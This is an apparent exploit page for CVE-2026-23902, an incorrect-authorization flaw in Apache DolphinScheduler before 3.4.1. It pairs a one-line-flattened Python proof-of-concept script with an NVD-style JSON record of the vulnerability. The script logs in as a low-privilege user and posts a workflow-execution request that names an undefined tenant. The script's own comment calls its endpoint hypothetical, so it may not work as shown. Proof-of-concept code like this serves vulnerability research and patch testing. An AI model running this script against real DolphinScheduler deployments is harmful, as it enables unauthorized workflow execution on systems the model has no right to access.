CVE-2026-23902

import requests # Target configuration TARGET_URL = "http://localhost:12345/dolphinscheduler" USERNAME = "low_priv_user" PASSWORD = "password" def login(): """Authenticate with the application to get a session token.""" session = requests.Session() login_payload = { "userName": USERNAME, "userPassword": PASSWORD } response = session.post(f"{TARGET_URL}/login", data=login_payload) if response.status_code == 200: print("[+] Login successful") return session else: print("[-] Login failed") return None def exploit(session): """Exploit the authorization bypass to use an undefined tenant.""" # Payload attempting to execute a workflow with a non-existent tenant exploit_data = { "processDefinitionCode": 1, "scheduleTime": "2026-04-24 12:00:00", "tenantCode": "NON_EXISTENT_TENANT_999", "execUser": USERNAME } headers = {"Content-Type": "application/json"} print(f"[*] Attempting to execute workflow with tenant: {exploit_data['tenantCode']}") # Endpoint to execute workflow (hypothetical based on API structure) exec_url = f"{TARGET_URL}/projects/test/executors/start-process-instance" response = session.post(exec_url, json=exploit_data, headers=headers) if response.status_code == 200: print("[+] Exploit successful! Workflow executed with undefined tenant.") print(f"[+] Response: {response.text}") else: print("[-] Exploit failed or endpoint changed.") if __name__ == "__main__": sess = login() if sess: exploit(sess)

{"cve": {"id": "CVE-2026-23902", "sourceIdentifier": "[email protected]", "published": "2026-04-24T12:17:06.453", "lastModified": "2026-04-27T13:42:29.420", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Incorrect Authorization vulnerability in Apache DolphinScheduler allows authenticated users with system login permissions to use tenants that are not defined on the platform during workflow execution.\n\nThis issue affects Apache DolphinScheduler versions prior to 3.4.1. \n\nUsers are recommended to upgrade to version 3.4.1, which fixes this issue."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apache:dolphinscheduler:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.4.1", "matchCriteriaId": "AD2DFC41-4AAE-4940-A40C-94421F0024DC"}]}]}], "references": [{"url": "https://lists.apache.org/thread/hy4ntb2gys8150zfmnxhsd5ph0hoh7s9", "source": "[email protected]", "tags": ["Mailing List", "Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/04/24/1", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory"]}]}}